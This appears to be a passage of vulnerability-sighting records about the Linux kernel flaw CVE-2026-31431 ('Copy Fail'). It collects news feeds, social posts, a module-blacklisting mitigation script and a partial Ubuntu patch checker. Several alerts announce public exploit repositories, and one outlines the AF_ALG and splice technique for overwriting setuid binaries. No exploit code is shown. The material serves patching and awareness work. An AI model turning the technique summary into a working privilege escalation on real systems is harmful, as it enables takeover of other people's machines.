Apr 2026 06:06:00 GMT\n    \n\n  \n", "creation_timestamp": "2026-05-10T09:53:12.000000Z"}, {"uuid": "d760210e-f8d0-49ca-be70-723c0688e4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ael0030-ai/4829553e4ca557c5523ee2dabb2beb2d", "content": "\n\n  \n\n    Noticias de Alejandro Espa\u00f1a Lanceta\n    https://gist.githubusercontent.com/ael0030-ai/99660b1cfd870d17095a16aa263a4251/raw/noticias.xml\n    Pr\u00e1ctica 9 del Tema 17\n    es\n\n    \n    \n      Vulnerabilidad cr\u00edtica en Windows Server WSUS permite ejecuci\u00f3n remota\n      https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/\n      Una vulnerabilidad grave en Windows Server WSUS (CVE-2025-59287) est\u00e1 siendo explotada activamente, permitiendo a atacantes ejecutar c\u00f3digo remoto en servidores vulnerables.\n        \n      ]]>\n      https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/\n      ael0030@medac.es\n      Fri, 24 Oct 2025 10:42:00 GMT\n    \n\n    \n    \n      Ransomware BlackCat aprovecha servidores Exchange sin parchear\n      https://www.zdnet.com/article/microsoft-ransomware-gangs-using-unpatched-exchange-servers/\n      Microsoft ha alertado de que grupos de ransomware como BlackCat est\u00e1n explotando servidores Exchange sin actualizar para infiltrarse en redes corporativas.\n        \n      ]]>\n      https://www.zdnet.com/article/microsoft-ransomware-gangs-using-unpatched-exchange-servers/\n      ael0030@medac.es\n      Tue, 14 Jun 2022 08:11:00 GMT\n    \n\n    \n    \n      Fallo 'Copy Fail' en el kernel de Linux permite obtener acceso root\n      https://www.securityweek.com/copy-fail-logic-flaw-in-linux-kernel-enables-system-takeover/\n      Una vulnerabilidad en el kernel de Linux (CVE-2026-31431) permite a atacantes locales escalar privilegios y obtener acceso root en pr\u00e1cticamente cualquier distribuci\u00f3n.\n        \n      ]]>\n      https://www.securityweek.com/copy-fail-logic-flaw-in-linux-kernel-enables-system-takeover/\n      ael0030@medac.es\n      Thu, 30 Apr 2026 06:06:00 GMT\n    \n\n  \n\n\n", "creation_timestamp": "2026-05-10T09:58:30.000000Z"}, {"uuid": "d2481e05-411b-486c-a885-1c9aaf78c3c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ael0030-ai/edde819e9e4d3337189517c21500ce61", "content": "\n\n  \n\n    Noticias de Alejandro Espa\u00f1a Lanceta\n    https://gist.githubusercontent.com/ael0030-ai/99660b1cfd870d17095a16aa263a4251/raw/noticias.xml\n    Pr\u00e1ctica 9 del Tema 17\n    es\n\n    \n    \n      Vulnerabilidad cr\u00edtica en Windows Server WSUS permite ejecuci\u00f3n remota\n      https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/\n      Una vulnerabilidad grave en Windows Server WSUS (CVE-2025-59287) est\u00e1 siendo explotada activamente, permitiendo a atacantes ejecutar c\u00f3digo remoto en servidores vulnerables.\n        \n      ]]>\n      https://www.securityweek.com/critical-windows-server-wsus-vulnerability-exploited-in-the-wild/\n      ael0030@medac.es\n      Fri, 24 Oct 2025 10:42:00 GMT\n    \n\n    \n    \n      Ransomware BlackCat aprovecha servidores Exchange sin parchear\n      https://www.zdnet.com/article/microsoft-ransomware-gangs-using-unpatched-exchange-servers/\n      Microsoft ha alertado de que grupos de ransomware como BlackCat est\u00e1n explotando servidores Exchange sin actualizar para infiltrarse en redes corporativas.\n        \n      ]]>\n      https://www.zdnet.com/article/microsoft-ransomware-gangs-using-unpatched-exchange-servers/\n      ael0030@medac.es\n      Tue, 14 Jun 2022 08:11:00 GMT\n    \n\n    \n    \n      Fallo 'Copy Fail' en el kernel de Linux permite obtener acceso root\n      https://www.securityweek.com/copy-fail-logic-flaw-in-linux-kernel-enables-system-takeover/\n      Una vulnerabilidad en el kernel de Linux (CVE-2026-31431) permite a atacantes locales escalar privilegios y obtener acceso root en pr\u00e1cticamente cualquier distribuci\u00f3n.\n        \n      ]]>\n      https://www.securityweek.com/copy-fail-logic-flaw-in-linux-kernel-enables-system-takeover/\n      ael0030@medac.es\n      Thu, 30 Apr 2026 06:06:00 GMT\n    \n\n  \n", "creation_timestamp": "2026-05-10T10:07:40.000000Z"}, {"uuid": "6e54b950-e248-4ff3-99d8-fdd9aad38b23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/bottiger1/83d95b500a135a7283504995082a87dd", "content": "#!/usr/bin/env bash\n# CVE-2026-31431 (Copy Fail) | CVE-2026-43284 / CVE-2026-43500 (Dirty Frag)\nset -euo pipefail\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'; NC='\\033[0m'\nok()   { echo -e \"  [${GRN}OK${NC}]   $*\"; }\nwarn() { echo -e \"  [${YEL}WARN${NC}] $*\"; }\nerr()  { echo -e \"  [${RED}FAIL${NC}] $*\"; }\n\nCONF=\"/etc/modprobe.d/dirtyfrag.conf\"\nMODS=(algif_aead esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || { err \"Run as root\"; exit 1; }\n\nprintf 'install %s /bin/false\\n' \"${MODS[@]}\" > \"$CONF\"\nok \"Wrote $CONF\"\n\nfor mod in \"${MODS[@]}\"; do\n    if lsmod | grep -q \"^${mod} \"; then\n        rmmod \"$mod\" 2>/dev/null && ok \"Unloaded $mod\" || warn \"Could not unload $mod \u2014 reboot needed\"\n    else\n        ok \"Not loaded: $mod\"\n    fi\ndone\n\necho -e \"\\nVerification:\"\nall_ok=true\nfor mod in \"${MODS[@]}\"; do\n    grep -q \"install ${mod} /bin/false\" \"$CONF\" 2>/dev/null \\\n        && ok \"Blocked: $mod\" || { err \"Rule missing: $mod\"; all_ok=false; }\n    lsmod | grep -q \"^${mod} \" \\\n        && { warn \"Still loaded: $mod \u2014 reboot required\"; all_ok=false; }\ndone\n\n$all_ok && echo -e \"\\n${GRN}\u2714 Done.${NC}\" || echo -e \"\\n${YEL}\u26a0 Reboot to complete.${NC}\"", "creation_timestamp": "2026-05-09T20:54:35.000000Z"}, {"uuid": "000de011-dd67-471b-9b77-817812f972fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mlh5vn34kk2x", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u300cCopy Fail\u300d - PoC\u516c\u958b\u6e08\u307f\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306b\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\u304c\u78ba\u8a8d\u3055\u308c\u305f\u3002\u4e3b\u8981\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u304c\u5f71\u97ff\u3092\u53d7\u3051\u308b\u3068\u3055\u308c\u3066\u304a\u308a\u3001\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u304c\u547c\u3073\u304b\u3051\u3089\u308c\u3066\u3044\u308b\u3002\n\n\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u304croot\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u8106\u5f31\u6027\u300cCVE-2026-31431\u300d\u304c\u660e\u3089\u304b\u3068\u306a\u3063\u305f\u3082\u306e\u3002\u5225\u540d\u300cCopy Fail\u300d\u3068\u3082\u540d\u4ed8\u3051\u3089\u308c\u3066\u3044\u308b\u3002\n\n\u539f\u56e0\u3068\u3055\u308c\u308b\u30ab\u30fc\u30cd\u30eb\u6697\u53f7\u5316API\u306e\u30e6\u30fc\u30b6\u30fc\u7a7a\u9593\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u306f\u30012017\u5e74\u4ee5\u964d\u306b\u30ea\u30ea\u30fc\u30b9\u3055\u308c\u305f\u307b\u307c\u3059\u3079\u3066\u306e\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u304c\u30c7\u30d5\u30a9\u30eb\u30c8\u8a2d\u5b9a\u3067\u6709\u52b9\u5316\u3055\u308c\u3066\u304a\u308a\u3001\u5f71\u97ff\u3092\u53d7\u3051\u308b\u3068\u3044\u3046\u3002\n\n\u8907\u6570\u306e\u30e6\u30fc\u30b6\u30fc\u304c\u5229\u7528\u3059\u308b\u30de\u30eb...", "creation_timestamp": "2026-05-09T21:12:08.237156Z"}, {"uuid": "d4dc1479-f4db-420e-b110-df2aa8fdbab9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83639", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Porting-CVE-2026-31431-Copy-Fail-to-a-Constrained-Java-Runner\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a karollooool\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-10 09:51:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 (copy.fail) \u2014 adapted for constrained Java execution environments via FFM syscall layer + javac   annotation processor delivery\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T10:00:04.000000Z"}, {"uuid": "86b8faec-d94b-4d74-80c3-df02339728cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/MtALigBXUwxWZ4IXshd7DuJETnLgMy9WFEBN7wv13OmJfPjP", "content": "", "creation_timestamp": "2026-05-10T17:03:55.000000Z"}, {"uuid": "dfe84f6b-595b-4af2-aee6-644066f3b931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mljplcli3c2g", "content": "\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300dLinux\u8106\u5f31\u6027\u306e\u60aa\u7528\u304c\u59cb\u307e\u308a\u307e\u3059\n\n\u7c73\u56fd\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u95a2CISA\u306f\u3001\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u304c\u6700\u8fd1\u516c\u958b\u3055\u308c\u305fLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u3092\u60aa\u7528\u3057\u3001\u30eb\u30fc\u30c8\u30b7\u30a7\u30eb\u3078\u306e\u30a2\u30af\u30bb\u30b9\u306b\u3064\u306a\u304c\u3063\u3066\u3044\u308b\u3068\u8b66\u544a\u3057\u3066\u3044\u307e\u3059\u3002\n\nCVE-2026-31431 \u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u3001Copy Fail \u3068\u547c\u3070\u308c\u305f\u3053\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4e0a\u306e\u6b20\u9665\u306f\u3001\u307b\u307c10\u5e74\u306b\u308f\u305f\u308a\u6f5c\u3093\u3060\u3082\u306e\u3067\u3042\u308a\u30012017 \u5e74\u4ee5\u964d\u3001\u3059\u3079\u3066\u306e Linux \u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5f71\u97ff\u3092\u53ca\u307c\u3057\u3066\u3044\u307e\u3059\u3002\n\n\u30ab\u30fc\u30cd\u30eb\u306e\u8a8d\u8a3cAEAD\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u308b\u30d0\u30b0\u306b\u3088\u308a\u3001\u30b3\u30fc\u30c9\u5b9f\u884c\u6a29\u9650\u3092\u6301\u3064\u8a8d\u8a3c\u3055\u308c\u305f\u653b\u6483\u8005\u306f\u3001\u8aad\u307f\u53d6\u308a\u53ef\u80fd\u306a setuid\u2010root \u30d0\u30a4\u30ca\u30ea\u2026", "creation_timestamp": "2026-05-10T21:33:53.863691Z"}, {"uuid": "1f9baf88-90c5-4e00-a36f-7729b139710b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mljppobf6s2g", "content": "\u7c73\u56fdCISA\u306f\u3001\u65e2\u77e5\u306e\u60aa\u7528\u8106\u5f31\u6027\u30ab\u30bf\u30ed\u30b0\u306bLINUX\u30ab\u30fc\u30cd\u30eb\u306e\u6b20\u9665\u3092\u8ffd\u52a0\u3057\u307e\u3057\u305f\n\n\u7c73\u56fd\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u30fc\u30fb\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u95a2\uff08CISA\uff09\u306f\u3001Linux\u30ab\u30fc\u30cd\u30eb\u306e\u6b20\u9665\u3092\u65e2\u77e5\u306e\u60aa\u7528\u8106\u5f31\u6027\u30ab\u30bf\u30ed\u30b0\u306b\u8ffd\u52a0\u3057\u307e\u3057\u305f\u3002\n\n\u7c73\u56fd\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u30fc\u30fb\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u95a2\uff08CISA\uff09\u306f\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306b\u8106\u5f31\u6027\uff08CVE-2026-31431\uff08CVSS\u30b9\u30b3\u30a27.8\uff09\u3067\u8ffd\u8de1\uff09\u3092\u3001\u65e2\u77e5\u306e\u60aa\u7528\u8106\u5f31\u6027\uff08KEV\uff09\u30ab\u30bf\u30ed\u30b0\u306b\u8ffd\u52a0\u3057\u307e\u3057\u305f\u3002\n\n\u6700\u8fd1\u3001Xint Code \u306e\u7814\u7a76\u8005\u306f\u3001CVE-2026-31431 \u3068\u3057\u3066\u8ffd\u8de1\u3055\u308c\u308b\u6df1\u523b\u306a Linux \u306e\u6b20\u9665\u304c\u30b3\u30d4\u30fc\u5931\u6557\u3068\u547c\u3070\u308c\u308b\u2026", "creation_timestamp": "2026-05-10T21:36:16.312087Z"}, {"uuid": "93a18e79-b4a2-4002-8f95-42ba2203f1c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/technoholic.bsky.social/post/3mljw3s4ynu2j", "content": "New unpatched Linux kernel LPE flaw, 'Dirty Frag', is a successor to CVE-2026-31431 (CVSS 7.8). Actively exploited in the wild. Reported to kernel maintainers. Stay vigilant!", "creation_timestamp": "2026-05-10T23:30:24.011800Z"}, {"uuid": "8c43fcd8-7bc9-4dcb-9aeb-861fc354f0b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlk7e5vfir32", "content": "Copy Fail (CVE-2026-31431): Frequently asked questions about Linux kernel privilege escalation vulnerability A flaw in the Linux kernel present since 2017 allows a local user to gain root access on...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T02:16:11.002622Z"}, {"uuid": "aafc652d-6bc9-448e-81b1-551300eeba28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlk7psdid6r2", "content": "Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation and Kernel Update on CloudLinux A week after Copy Fail (CVE-2026-31431), researcher Hyunwoo Kim disclosed a second Linux kernel local privil...\n\n#KernelCare #CVE #Vulnerability #Kernel #Update #AlmaLinux #CloudLinux\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-11T02:22:41.778892Z"}, {"uuid": "b99e1e11-cc9c-49d1-9286-d42f6582421b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlka652tl522", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 141 interactions\nCVE-2026-43284: 122 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-42511: 56 interactions\nCVE-2024-13362: 4 interactions\nCVE-2026-29201: 3 interactions\n", "creation_timestamp": "2026-05-11T02:30:39.061058Z"}, {"uuid": "7b467790-afe4-4098-b6ac-3c6cfaa42446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83734", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Lutfifakee-Project\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-11 01:30:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 - Linux Kernel Page Cache Vulnerability\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-11T02:00:04.000000Z"}, {"uuid": "91442b44-bec3-4da1-bd05-db4f17503abd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/evilbitlabs.io/post/3mlkdi2kr2k2l", "content": "This week's Threat Digest: Copy Fail (CVE-2026-31431) gives any Linux user root and walks through container boundaries. Plus AiTM phishing at 35K users, cPanel on KEV, DPRK laptop farm sentencings. CISA deadline for Copy Fail is Thursday.\n\nnews.evilbitlabs.io/2026-05-10-e...", "creation_timestamp": "2026-05-11T03:29:53.655024Z"}, {"uuid": "02ef0846-21e8-412e-9cb0-16f7b1a3a074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Q5Ca/4b05c80320c52225684791fc3ae2fa1e", "content": "", "creation_timestamp": "2026-05-11T03:35:32.000000Z"}, {"uuid": "aace9b07-08f3-4a9a-8090-939af202e0fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Q5Ca/586fa0a188386f1fd13461d67d6fe6de", "content": "", "creation_timestamp": "2026-05-11T03:38:31.000000Z"}, {"uuid": "f44daae1-28a7-42dd-908f-73d1abfa8867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83585", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy_Grail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a cleozi\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C++\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-10 00:45:32\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nElegant C++ exploit for CVE-2026-31431 (Copy Fail) using AF_ALG authenticated encryption + splice(2) to overwrite setuid binary memory\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T01:00:05.000000Z"}, {"uuid": "eb9ed973-9f11-4346-abb2-8eb59e7c1db5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlhpojezmi2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 164 interactions\nCVE-2026-43284: 120 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-43284: 59 interactions\nCVE-2026-43500: 53 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-10T02:30:15.454823Z"}, {"uuid": "646a3ffd-6f41-4b46-8170-be27e4c0bcd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/anupyadav.bsky.social/post/3mll56y4dqk2u", "content": "Parrot OS 7.2 is out! \ud83e\udd9c Critical Copy Fail patch (CVE-2026-31431), Linux 6.19.13, 15 updated tools & a new Hack The Box Edition. If you're a pentester \u2014 update now.\n techrefreshing.com/whats-new-in...\n#ParrotOS #Linux #CyberSecurity #EthicalHacking #Infosec", "creation_timestamp": "2026-05-11T11:10:15.448208Z"}, {"uuid": "12cab1f9-09d2-4aa4-9327-43a698580430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260511", "content": "", "creation_timestamp": "2026-05-10T18:00:00.000000Z"}, {"uuid": "101c25b5-b585-41fa-a0aa-2968bcf5954a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ruari.velocipederider.com.ap.brid.gy/post/3mlkroxxmpot2", "content": "I upgraded my kernel for Copy Fail (CVE-2026-31431) not that long ago.\n\nNow I am upgrading again for Dirty Frag (CVE-2026-43284 and CVE-2026-43500).\n\nI hope things clam down a bit now but I guess we shall see\u2026", "creation_timestamp": "2026-05-11T07:47:08.025911Z"}, {"uuid": "ea7ffd8e-4d8a-4006-8acb-aafaccf6fdf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/minyagiri.net/post/3mlkvgvbybkaw", "content": "\u3053\u308c\u306b\u95a2\u3059\u308b\u4fee\u6b63\u306f\u3069\u3046\u306a\u3063\u305f\u3093\u3060\u308d\u3046\u3068\u601d\u3063\u305f\u3089\u3001Debian 13 Trixier \u306f Kernel 6.12.86-1 \u3067\u4fee\u6b63\u6e08\u307f\u3060\u3063\u305f\u3002\n\u6d41\u77f3\u306b\u901f\u3044\u306a\u266a\n\nCVE-2026-31431\nhttps://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-05-11T08:51:21.554729Z"}, {"uuid": "fe3e5206-2ee9-43a0-97de-a50e0fa5e2c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3mlkvt3hwky2x", "content": "Copy Fail (CVE-2026-31431): A Technical Deep Dive", "creation_timestamp": "2026-05-11T08:58:10.848183Z"}, {"uuid": "1d630eae-ffc7-484d-b3d1-76e949dda2c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/walleralexander/d880563c357deab2c385b6f5f35cc254", "content": "#!/usr/bin/env bash\n# check-copy-fail.sh\n# Nicht-destruktive Pr\u00fcfung auf CVE-2026-31431 (\"Copy Fail\") f\u00fcr Ubuntu. \n# Fragt automatisch die Ubuntu Security API ab und vergleicht Versionen.\n# Kein Exploit, keine \u00c4nderungen am System.\n\nset -u\n\nCVE_ID=\"CVE-2026-31431\"  \nAPI_URL=\"https://ubuntu.com/security/cves/${CVE_ID}.json\"  \n\n# --- Argumente ---------------------------------------------------------------\nVERBOSE=0\nfor arg in \"$@\"; do  \n    case \"$arg\" in  \n        -v|--verbose) VERBOSE=1 ;;\n        -h|--help)\n            cat </dev/null 2>&1 || MISSING=\"$MISSING $tool\"  \ndone\n[ -n \"$MISSING\" ] && warn \"Fehlende Tools:$MISSING\"  \n\n# --- 1. Distribution + Release-Codename --------------------------------------\necho \"${B}[1/5] Distribution${N}\"  \nRELEASE_CODENAME=\"\"  \nif [ -r /etc/os-release ]; then\n    . /etc/os-release\n    info \"$PRETTY_NAME\"  \n    RELEASE_CODENAME=\"${UBUNTU_CODENAME:-${VERSION_CODENAME:-}}\"  \n    info \"Codename: ${RELEASE_CODENAME:-unbekannt}\"  \n    [ \"${ID:-}\" != \"ubuntu\" ] && warn \"Nicht Ubuntu \u2014 Ergebnisse evtl. ungenau.\"  \nelse\n    warn \"/etc/os-release nicht lesbar.\"  \nfi\necho\n\n# --- 2. Kernel-Version + installiertes Paket ---------------------------------\necho \"${B}[2/5] Kernel & Paket${N}\"  \nKVER=$(uname -r)\ninfo \"Laufender Kernel: $KVER\"  \n\nKPKG=\"linux-image-${KVER}\"  \nINSTALLED_VER=\"\"  \nSOURCE_PKG=\"\"  \nif dpkg-query -W -f='${Version}' \"$KPKG\" >/dev/null 2>&1; then  \n    INSTALLED_VER=$(dpkg-query -W -f='${Version}' \"$KPKG\")  \n    SOURCE_PKG=$(dpkg-query -W -f='${source:Package}' \"$KPKG\" 2>/dev/null)  \n\n    # Ubuntu trackt CVEs unter dem unsignierten Kernel-Source-Paket.\n    # 'linux-signed-hwe-6.17' -> 'linux-hwe-6.17' \n    # 'linux-signed'          -> 'linux' \n    # 'linux-signed-aws'      -> 'linux-aws' \n    SOURCE_PKG_TRACK=$(echo \"$SOURCE_PKG\" | sed -E 's/^linux-signed(-|$)/linux\\1/; s/-$//')  \nelse\n    warn \"Kernel-Paket nicht via dpkg auffindbar (Custom-Kernel?).\"  \n    SOURCE_PKG_TRACK=\"\"  \nfi\n\nREBOOT_PENDING=0\nif [ -f /var/run/reboot-required ]; then\n    warn \"Reboot ausstehend \u2014 neuer Kernel erst nach Reboot aktiv!\"  \n    REBOOT_PENDING=1\nfi\necho\n\n# --- 3. Patch-Status via Ubuntu Security API ---------------------------------\necho \"${B}[3/5] Patch-Status (Ubuntu Security API)${N}\"  \nPATCH_STATUS=\"unknown\"  \nKMOD_FIX_STATUS=\"unknown\"   # 'patched' | 'vulnerable' | 'unknown'  \nFIXED_VER=\"\"  \n\nif [ -n \"$RELEASE_CODENAME\" ] && command -v curl >/dev/null && command -v python3 >/dev/null; then  \n\n    info 